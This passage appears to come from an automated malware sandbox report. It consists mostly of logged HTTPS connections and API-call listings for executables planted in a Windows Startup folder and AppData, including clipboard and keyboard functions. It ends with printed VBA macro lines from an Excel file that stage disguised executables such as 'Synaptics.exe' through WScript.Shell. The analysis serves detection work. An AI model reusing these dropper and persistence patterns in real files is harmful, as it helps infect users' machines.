                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49730 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49741 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49740 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49755 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49754 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49766 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49767 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49774 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49772 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49771 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49773 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49784 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49783 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49788 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49789 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49790 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49787 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49800 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49801 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49810 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49811 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49821 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49822 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49831 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49832 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49852 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49851 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49870 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49871 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49882 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49881 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49896 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49897 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49904 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49906 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49905 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49907 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49926 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49925 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49944 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49945 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49953 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49956 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49970 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49969 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49982 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49980 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50001 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50002 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50019 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50020 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50036 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50037 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50055 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50056 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50075 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50076 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50084 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50086 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50105 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50104 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50115 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50117 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50130 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50129 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50143 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50144 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50160 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50161 version: TLS 1.2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00237099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,7_2_00237099
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00237294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_00237294
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E57294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,16_2_00E57294
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00237294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,22_2_00237294
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00237099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,7_2_00237099
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00224342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,7_2_00224342
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0024F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,7_2_0024F5D0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,16_2_00E6F5D0
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,22_2_0024F5D0

                                System Summary

                                barindex
                                Document contains an embedded VBA macro with suspicious strings
                                Source: 32pAPMdc.xlsm.8.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: 32pAPMdc.xlsm.8.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: 32pAPMdc.xlsm.8.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: 32pAPMdc.xlsm.8.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: 32pAPMdc.xlsm.8.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
